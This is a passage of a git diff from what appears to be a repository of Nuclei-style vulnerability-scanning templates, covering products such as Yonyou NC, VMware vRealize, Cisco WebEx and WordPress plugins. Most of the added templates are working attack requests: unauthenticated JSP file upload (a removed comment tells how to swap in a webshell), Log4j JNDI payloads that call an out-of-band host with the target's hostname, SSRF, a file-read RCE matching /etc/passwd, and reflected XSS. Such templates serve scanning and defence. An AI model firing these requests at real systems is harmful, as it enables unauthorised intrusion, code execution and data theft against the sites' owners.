+        GET /ncupload/n2d19a.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200"
+          - "status_code_2 == 200 && contains(body_2,'just_a_test')"
+        condition: and
+
+# digest: 4b0a00483046022100b133fa848f0dfa29959a4593e87849235eec2ba638a6b83ab7726c39748bb592022100b4ef8f4f815d5b12f118f5770b9b7dee0d102fa7942007358ba698c3ac5d932d:922c64590222798bb761d5b6d8e72950
diff --git a/poc/upload/yonyou-nc-grouptemplet-fileupload.yaml b/poc/upload/yonyou-nc-grouptemplet-fileupload.yaml
old mode 100644
new mode 100755
index 13f1632625..06d784f482
--- a/poc/upload/yonyou-nc-grouptemplet-fileupload.yaml
+++ b/poc/upload/yonyou-nc-grouptemplet-fileupload.yaml
@@ -1,51 +1,45 @@
 id: yonyou-nc-grouptemplet-fileupload
 
 info:
-  name: 用友nc grouptemplet接口任意文件上传
-  author: pphua
+  name: UFIDA NC Grouptemplet Interface - Unauthenticated File Upload
+  author: SleepingBag945
   severity: critical
-  tags: yonyou,fileupload,nc
-  reference: 
-    - https://
+  description: |
+    The UFIDA NC Grouptemplet Interface permits unauthenticated users to upload potentially malicious files.
+  reference:
+    - https://www.seebug.org/vuldb/ssvid-99547
+    - https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py
   metadata:
-    max-request: 2
     verified: true
-    fofa-query: title="YONYOU NC"
-
+    max-request: 2
+    fofa-query: app="用友-UFIDA-NC
+  tags: yonyou,intrusive,ufida,fileupload
 variables:
-  v1: '{{rand_base(5)}}'
+  v1: "{{rand_int(1,100)}}"
 
 http:
   - raw:
-      - |              
-        POST /uapim/upload/grouptemplet?groupid={{v1}}&fileType=txt HTTP/1.1
+      - |
+        POST /uapim/upload/grouptemplet?groupid={{v1}}&fileType=jsp HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
-        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryikyyjlra
-        Accept-Encoding: gzip
+        Content-type: multipart/form-data; boundary=----------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7
 
-        ------WebKitFormBoundaryikyyjlra
-        Content-Disposition: form-data; name="upload"; filename="{{v1}}.txt"
+        ------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7
+        Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.jsp"
         Content-Type: application/octet-stream
 
-        {{randstr}}
-        ------WebKitFormBoundaryikyyjlra
-        Content-Disposition: form-data; name="submit"
-
-        submit
-        ------WebKitFormBoundaryikyyjlra--
-      
+        <%out.println("{{randstr_2}}");%>
+        ------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7--
       - |
-        GET /uapim/static/pages/{{v1}}/head.txt HTTP/1.1
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+        GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1
+        Host: {{Hostname}}
 
+    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
           - "status_code_1 == 200"
-          - "status_code_2 == 200 && contains((body_2), '{{randstr}}')"
+          - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
         condition: and
 
-# 利用方式:只需将第一个请求包中的fileType=txt 修改为 fileType=jsp,并将内容修改为jsp马子即可
-# 注意:所有上传的文件名称都为head
-# 上传的地址: http://x.x.x.x/uapim/static/pages/{{v1}}/head.jsp v1代表poc随机生成的uid,可使用-debug参数查看http数据包
\ No newline at end of file
+# digest: 4a0a0047304502202c766a3202a46060a829d4b89895ae36490c268ec1e79e7ccd4ef68904687d2d022100ad6cdfb33e6377226c2903589eac7542d06e8be63c8e077a8471ab59ad1a8f25:922c64590222798bb761d5b6d8e72950
diff --git a/poc/vmware/vmware-operation-manager-log4j.yaml b/poc/vmware/vmware-operation-manager-log4j.yaml
index f589100224..8c90ad185b 100644
--- a/poc/vmware/vmware-operation-manager-log4j.yaml
+++ b/poc/vmware/vmware-operation-manager-log4j.yaml
@@ -15,11 +15,16 @@ info:
     cve-id: CVE-2021-44228
     cwe-id: CWE-77
   metadata:
+    max-request: 1
     shodan-query: title:"vRealize Operations Manager"
     verified: "true"
-  tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
+  tags: blind,fuzzing
 
-requests:
+variables:
+  rand1: '{{rand_int(111, 999)}}'
+  rand2: '{{rand_int(111, 999)}}'
+
+http:
   - raw:
       - |
         POST /ui/login.action HTTP/1.1
@@ -32,7 +37,7 @@ requests:
         Sec-Fetch-Mode: cors
         Sec-Fetch-Site: same-origin
 
-        mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
+        mainAction=login&userName=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
 
     matchers-condition: and
     matchers:
@@ -44,7 +49,7 @@ requests:
       - type: regex
         part: interactsh_request
         regex:
-          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
       - type: word
         part: header
@@ -56,8 +61,14 @@ requests:
         kval:
           - interactsh_ip # Print remote interaction IP in output
 
+      - type: regex
+        part: interactsh_request
+        group: 2
+        regex:
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output
+
       - type: regex
         part: interactsh_request
         group: 1
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
diff --git a/poc/web/chatgpt-web-unauth.yaml b/poc/web/chatgpt-web-unauth.yaml
index e013627b64..022ec62b2a 100644
--- a/poc/web/chatgpt-web-unauth.yaml
+++ b/poc/web/chatgpt-web-unauth.yaml
@@ -4,6 +4,7 @@ info:
   name: ChatGPT Web - Unauthorized Access
   author: SleepingBag945
   severity: high
+  description: ChatGPT Web is exposed.
   metadata:
     verified: true
     max-request: 1
@@ -37,5 +38,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a00463044022025e67a1afa68039433f2eeb68afb01b6cefcf700d2976a83d01845f87a2cfcf902204c852c5d7b15d180a10864001521e703eddde47ab3722d0090b6bfbf62f4b3f5:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450221009335765c3a461281c6686e5525ef4df6ad033b509221998c003f467783efccbe022002fed2ad57b70a38346af4229f8309b5d16a21de09c245e1af3638f9d0086475:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/web/cisco-webex-log4j-rce.yaml b/poc/web/cisco-webex-log4j-rce.yaml
new file mode 100644
index 0000000000..ab879def50
--- /dev/null
+++ b/poc/web/cisco-webex-log4j-rce.yaml
@@ -0,0 +1,66 @@
+id: cisco-webex-log4j-rce
+
+info:
+  name: Cisco WebEx - Remote Code Execution (Apache Log4j)
+  author: shaikhyaser
+  severity: critical
+  description: |
+    Cisco WebEx is susceptible to Log4j JNDI remote code execution. Cisco WebEx provides web conferencing, videoconferencing and contact center as a service applications.
+  reference:
+    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2021-44228
+    cwe-id: CWE-77
+  metadata:
+    max-request: 1
+    shodan-query: title:"Cisco WebEx"
+  tags: cve,cve2021,rce,jndi,log4j,cisco,webex,oast,kev
+variables:
+  rand1: '{{rand_int(111, 999)}}'
+  rand2: '{{rand_int(111, 999)}}'
+  str: "{{rand_base(5)}}"
+
+http:
+  - raw:
+      - |
+        POST /orion/login?siteurl=meet HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Referer: {{RootURL}}/orion/login?siteurl=meet&rnd=0.1359184728177283
+        X-Requested-With: XMLHttpRequest
+        Content-Type: application/x-www-form-urlencoded
+
+        type=getFailureTimes&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&bAjax=true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        group: 2
+        regex:
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+        part: interactsh_request
+
+      - type: regex
+        group: 1
+        regex:
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
+        part: interactsh_request
+
+# digest: 4a0a00473045022042bdc493eb4ec91bbcbcd56ef58972f45032f56c91a340ccc75e523f1953badf022100b70c8852cc0ae3850e5574cc27f06e2eaed76319f53bbb9e1cfe7a4061bd3640:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/cvsweb-detect.yaml b/poc/web/cvsweb-detect.yaml
new file mode 100644
index 0000000000..3a94bf7c33
--- /dev/null
+++ b/poc/web/cvsweb-detect.yaml
@@ -0,0 +1,45 @@
+id: cvsweb-detect
+
+info:
+  name: CVSweb - Detect
+  author: lu4nx
+  severity: info
+  description: |
+    CVSweb is a WWW interface for CVS repositories with which you can browse a file hierarchy on your browser to view each file's revision history in a very handy manner.
+  reference:
+    - https://cvsweb.openbsd.org/
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: title:"cvsweb"
+    fofa-query: title="cvsweb"
+    zoomeye-query: title:cvsweb
+  tags: tech,cvsweb,detect
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    host-redirects: true
+    max-redirects: 2
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'content=".*CVSweb.*"'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'content=".*CVSweb\s*([0-9.]+)"'
+
+# digest: 490a0046304402205edaaf4869f5e99128f50d300e222b62e3ff929787c084f7271cd034d9b450f502201f253ad5141e8777d354f91ae7cbe61e6a7d08b2a944d9c2cd1b5e30c6ca3b01:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/element-web-detect.yaml b/poc/web/element-web-detect.yaml
new file mode 100644
index 0000000000..ad7b412929
--- /dev/null
+++ b/poc/web/element-web-detect.yaml
@@ -0,0 +1,36 @@
+id: element-web-detect
+
+info:
+  name: Element Web - Detect
+  author: davidegirardi
+  severity: info
+  description: Identify if a web application is vanilla Element Web and return the version
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: html:"manifest.json"
+  tags: tech,matrix,element,detect
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/manifest.json"
+      - "{{BaseURL}}/version"
+
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200'
+          - 'contains(content_type_1, "application/json")'
+          - 'contains(json_minify(body_1), "\"name\":\"Element\"")'
+          - 'status_code_2 == 200'
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - '[^\s]+'
+# digest: 4a0a0047304502205410e006bfb51302b79c929988e99705a9fbdcba4f23221cad2c63bc02dc59ce022100ac77e3d22cc46dff3d215d2850f5349cc77bc9ca0700279ee10455163a4795b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/web/office-webapps-ssrf.yaml b/poc/web/office-webapps-ssrf.yaml
index 85231b0f37..dd69b267b1 100644
--- a/poc/web/office-webapps-ssrf.yaml
+++ b/poc/web/office-webapps-ssrf.yaml
@@ -4,6 +4,7 @@ info:
   name: Office Web Apps Server Full Read - Server Side Request Forgery
   author: DhiyaneshDK
   severity: high
+  description: Office Web Apps Server Full Read is vulnerable to SSRF.
   reference:
     - https://drive.google.com/file/d/1aeNq_5wVwHRR1np1jIRQM1hocrgcZ6Qu/view (Slide 37,38)
   metadata:
@@ -19,7 +20,7 @@ variables:
 http:
   - raw:
       - |
-        GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://oast.pro%26status=302&access_token_ttl=0 HTTP/1.1
+        GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://{{oast}}%26status=302&access_token_ttl=0 HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
@@ -29,5 +30,4 @@ http:
           - contains(body,'
 Interactsh Server 
')
           - status_code == 200
         condition: and
-
-# digest: 4a0a0047304502207e37c166b7939e67027a532a414b3ed954332b97d7a1ba9c8bc3ccf98c206614022100ba38deb6e2059ad4b76f56fae8b4f0accce143472e8c236e297c90365c1306c7:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100cbf861ff659932311fdb82c1a1d21e84d62817b2c805bc12eaacfdc5501c384a022061b6723822f822862e2d6b48259339781dcca9bd883f6502676870b3a14a1f26:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/web/unauth-temporal-web-ui.yaml b/poc/web/unauth-temporal-web-ui.yaml
index 29f3b9911a..5a81343763 100644
--- a/poc/web/unauth-temporal-web-ui.yaml
+++ b/poc/web/unauth-temporal-web-ui.yaml
@@ -15,7 +15,7 @@ info:
     verified: "true"
     max-request: 2
     shodan-query: http.favicon.hash:557327884
-  tags: temporal,unauth
+  tags: misconfig,temporal,unauth
 
 http:
   - method: GET
@@ -34,5 +34,4 @@ http:
           - "contains(body_2, 'nextPageToken') && status_code_2 == 200"
           - "contains(body_2, 'Namespace default is not found.') && status_code_2 == 404"
         condition: or
-
-# digest: 4a0a00473045022100fd80f97bd588e2a7735fbc258ea5b50508f786384b74adc3fafac28f96e32d4602202bee503f1cf7a9ddf2e4c4227239a0475e77a562fbf8ced464bb9cdf0fd21cfa:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e23471f799588e5121a981fa02bd8b1490449748125c06235ea2e1607e2439e3022100a92beae88b23261b448c696a9863d008afae153ea3759317a41ef9958c02e31e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/web/webcalendar-install.yaml b/poc/web/webcalendar-install.yaml
index 7757f115a7..c45245cbec 100644
--- a/poc/web/webcalendar-install.yaml
+++ b/poc/web/webcalendar-install.yaml
@@ -4,6 +4,7 @@ info:
   name: WebCalendar Exposed Installation
   author: ritikchaddha
   severity: high
+  description: WebCalendar is susceptible to the Installation page exposure due to misconfiguration.
   metadata:
     verified: true
     max-request: 1
@@ -27,5 +28,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022100e9426b7fb9f09e1d861e1b018d547d81ef7b1c7ec8aaa7162d69e549c799d54502201a5bbccf3045291af63667e7dd6cf2c1bd2af35bd6530ad7b2fe4969ffa9b9ca:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502203f9f9d0530a6128882d754e1bf7bdf02d01b355f189a08b28daeb95a1f748c71022100cef8e90c908df68dc0f8289901f9eca3896612e38649ba5edf5058132bce0b5f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/web/webtrees-install.yaml b/poc/web/webtrees-install.yaml
index f30af4277a..60f36908c1 100644
--- a/poc/web/webtrees-install.yaml
+++ b/poc/web/webtrees-install.yaml
@@ -4,6 +4,7 @@ info:
   name: WebTrees Exposed Installation
   author: ritikchaddha
   severity: high
+  description: WebTrees is susceptible to the Installation page exposure due to misconfiguration.
   metadata:
     verified: true
     max-request: 1
@@ -24,5 +25,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022100ea0af88ea06f5f77853b5cb6b6dce3053b7dbe060d10499ca5a0c5edf363a32e022068b3dde045e488cc3081c230b99c6f0b945a9e4222d9eade765ca6797e3d559e:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100ec41f6f8796153193b35d05f3bdb9b2581179314fc51bc115841bc202321b4ac022100beb0f0741344f7edbd03b32d0fac505b69af2fdb31f5d50a2819191aa8ad8725:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/wordpress/wp-gallery-file-upload.yaml b/poc/wordpress/wp-gallery-file-upload.yaml
new file mode 100644
index 0000000000..1459b7f9ce
--- /dev/null
+++ b/poc/wordpress/wp-gallery-file-upload.yaml
@@ -0,0 +1,48 @@
+id: wp-gallery-file-upload
+
+info:
+  name: WordPress Plugin Gallery 3.06 - Arbitrary File Upload
+  author: r3Y3r53
+  severity: high
+  description: |
+    The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability.
+  remediation: Fixed in version 3.1.1
+  reference:
+    - https://www.exploit-db.com/exploits/18998
+    - http://wordpress.org/extend/plugins/gallery-plugin/
+    - http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip
+    - https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353
+  metadata:
+    verified: true
+    max-request: 2
+    publicwww-query: /wp-content/plugins/gallery-plugin/
+    google-query: inurl:/wp-content/plugins/gallery-plugin/
+  tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive
+variables:
+  filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+  - raw:
+      - |
+        POST /wp-content/plugins/gallery-plugin/upload/php.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=WebKitFormBoundary20kgW2hEKYaeF5iP
+
+        --WebKitFormBoundary20kgW2hEKYaeF5iP
+        Content-Disposition: form-data; name="qqfile"; filename="{{filename}}.png"
+
+        {{randstr}}
+
+        --WebKitFormBoundary20kgW2hEKYaeF5iP--
+      - |
+        GET /wp-content/plugins/gallery-plugin/upload/files/{{filename}}.png HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(content_type_1, "text/html") && contains(content_type_2, "image/png")'
+          - 'contains(body_1, "success:true") && contains(body_2, "{{randstr}}")'
+        condition: and
+
+# digest: 4a0a0047304502202a745722b545793e04182b1db3e42251980ddd30a3bf2d24a01e66f5835d48c3022100a51cc6736be76c352b14ba34112aee6f4c91b99534d7c684bb5a22aa8538f467:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-real-estate-xss.yaml b/poc/wordpress/wp-real-estate-xss.yaml
new file mode 100644
index 0000000000..812d486da6
--- /dev/null
+++ b/poc/wordpress/wp-real-estate-xss.yaml
@@ -0,0 +1,37 @@
+id: wp-real-estate-xss
+
+info:
+  name: WordPress Real Estate 7 Theme <= 3.3.4 - Cross-Site Scripting
+  author: Harsh
+  severity: medium
+  description: |
+    The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.
+  reference:
+    - https://www.exploitalert.com/view-details.html?id=39344
+    - https://packetstormsecurity.com/files/171186/WordPress-Real-Estate-7-Theme-3.3.4-Cross-Site-Scripting.html
+    - https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/themes/realestate-7/"
+  tags: packetstorm,wordpress,wp-theme,wp,xss,realestate
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains(body, "")'
+          - 'contains(body, "/wp-content/themes/realestate-7/")'
+        condition: and
+
+# digest: 4a0a0047304502206c539003b913a5aa84666f731c82c96bb3aec3f8fe23d82ea49a4f605525ecba022100de91aaf7c5e02ad1c794895f6017562d5a314e1fd3bf1e877253019f285191b3:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-social-warfare-rce.yaml b/poc/wordpress/wp-social-warfare-rce.yaml
new file mode 100644
index 0000000000..52d75c141e
--- /dev/null
+++ b/poc/wordpress/wp-social-warfare-rce.yaml
@@ -0,0 +1,44 @@
+id: wp-social-warfare-rce
+
+info:
+  name: Social Warfare <= 3.5.2 - Remote Code Execution
+  author: theamanrawat
+  severity: critical
+  description: |
+    Unauthenticated remote code execution has been discovered in functionality that handles settings import.
+  remediation: Fixed in version 3.5.3
+  reference:
+    - https://wpscan.com/vulnerability/9259
+    - https://wordpress.org/plugins/social-warfare/
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/social-warfare/"
+  tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce
+
+http:
+  - raw:
+      - |
+        GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url={{path}} HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      path: helpers/payloads/wp-social-warfare-rce.txt
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+
+      - type: word
+        part: body
+        words:
+          - 'No changes made'
+
+      - type: status
+        status:
+          - 500
+
+# digest: 4b0a00483046022100b422b9d2f6f7cb6f3086df500121ac639b2f4fc54cbc83b2ba41e8a26b0d4805022100e530bfee70cc44ac1a0c3e2097cecf0b1442c2f2093c923018d14de1c5d47353:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-superstorefinder-misconfig.yaml b/poc/wordpress/wp-superstorefinder-misconfig.yaml
new file mode 100644
index 0000000000..a1a731a66a
--- /dev/null
+++ b/poc/wordpress/wp-superstorefinder-misconfig.yaml
@@ -0,0 +1,33 @@
+id: wp-superstorefinder-misconfig
+
+info:
+  name: Superstorefinder WP-plugin - Security Misconfigurations
+  author: r3Y3r53
+  severity: medium
+  description: |
+    Security misconfiguration is a common security issue that occurs when a system, application, or network is not properly configured to protect against threats and vulnerabilities.
+  reference:
+    - https://cxsecurity.com/issue/WLB-2021010145
+    - https://www.exploitalert.com/view-details.html?id=36983
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: /wp-content/plugins/superstorefinder-wp/
+    google-query: inurl:"wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php"
+  tags: wordpress,wp-plugin,superstorefinder-wp,wp,misconfig
+
+http:
+  - raw:
+      - |
+        GET /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "Name") && contains(body, "CategoriesTags") && contains(body, "email")'
+          - 'contains(content_type, "text/html")'
+        condition: and
+
+# digest: 490a0046304402205624314a7fa843184b0006a4166011527395e568b8ad05b057c6736e989da9ba02200811b24c1e44539543fbb7c61236aa51bea06d2e84315390ed2377fb5f156f91:922c64590222798bb761d5b6d8e72950
diff --git a/poc/xss/beyond-trust-xss.yaml b/poc/xss/beyond-trust-xss.yaml
new file mode 100644
index 0000000000..06bb84947f
--- /dev/null
+++ b/poc/xss/beyond-trust-xss.yaml
@@ -0,0 +1,31 @@
+id: beyond-trust-xss
+
+info:
+  name: BeyondTrust Remote Support 6.0 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.
+  reference:
+    - https://www.exploit-db.com/exploits/50632
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"BeyondTrust"
+    google-query: intext:"BeyondTrust" "Redistribution Prohibited"
+  tags: beyondtrust,xss,intrusive
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/appliance/login?login[password]={{randstr}}%22%3E%3Csvg/onload=alert(document.domain)%3E&login[use_curr]=1&login[submit]=Change%20Password"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains(body, "") && contains(body, "beyondtrust")'
+        condition: and
+
+# digest: 4b0a00483046022100c1764a9162e0a6176f9467763300c3098e083df7c6d3d009c45082d04cdb80c8022100ad8e61a167d489f140299c3f1325493fcb534851d8d6145a521178d8927ae12c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/xss/junos-xss.yaml b/poc/xss/junos-xss.yaml
new file mode 100644
index 0000000000..65691a796e
--- /dev/null
+++ b/poc/xss/junos-xss.yaml
@@ -0,0 +1,51 @@
+id: junos-xss
+
+info:
+  name: JunOS - Cross-Site Scripting
+  author: DhiyaneshDK
+  severity: medium
+  reference:
+    - https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: title:"Juniper Web Device Manager"
+    fofa-query: title="Juniper Web Device Manager"
+  tags: junos,xss
+
+variables:
+  string: "{{to_lower(rand_base(2))}}"
+
+http:
+  - raw:
+      - |
+        POST /webauth_operation.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        rs=emit_debug_note&rsargs[]={{string}}&rsargs[]=
+
+      - |
+        POST /webauth_operation.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        rs=sajax_show_one_stub&rsargs[]={{string}}
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        name: emit-debug-note-xss
+        words:
+          - "ERROR: "
+          - "monospace"
+        condition: and
+
+      - type: word
+        name: sajax-show-one-stub-xss
+        words:
+          - ""
+          - "wrapper for"
+        condition: and
+# digest: 490a0046304402207bac5270d60e93e8c0917e948d364d49fa4b326f8ab53b07e2411d736bbedea3022015b5724be40867e52634c42f62d4efb59de6b96634fb125e90fad2aaac245d7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/xss/photoblocks-grid-gallery-xss.yaml b/poc/xss/photoblocks-grid-gallery-xss.yaml
new file mode 100644
index 0000000000..d8eee65d19
--- /dev/null
+++ b/poc/xss/photoblocks-grid-gallery-xss.yaml
@@ -0,0 +1,35 @@
+id: photoblocks-grid-gallery-xss
+
+info:
+  name: Gallery Photoblocks < 1.1.41 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    Reflected Cross-Site Scripting (XSS) is a type of web vulnerability where an attacker injects malicious scripts into a website, and the injected code gets reflected back to the user's browser, executing the script in the context of the vulnerable website.
+  remediation: Fixed in version 1.1.41
+  reference:
+    - https://plugins.trac.wordpress.org/changeset/2117972
+    - https://wpscan.com/vulnerability/5c57e78a-97b9-4e23-8935-e4c9d806c89d
+    - https://wordpress.org/plugins/photoblocks-grid-gallery/
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/"
+  tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss
+
+http:
+  - raw:
+      - |
+        GET /wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains(body, "")'
+          - 'contains(body, "PhotoBlocks")'
+        condition: and
+
+# digest: 4a0a00473045022100e25d0c3f2b8523d249ea8a1fcf6aa3cb5352dde3741a6d1d98af45fbc385795002206e778ddccd1913d8f33ffe208083c9d0913d0952757b3d3e7f3a52afd8e89deb:922c64590222798bb761d5b6d8e72950
diff --git a/poc/xss/sitecore-xml-xss.yaml b/poc/xss/sitecore-xml-xss.yaml
new file mode 100644
index 0000000000..cc2218efd6
--- /dev/null
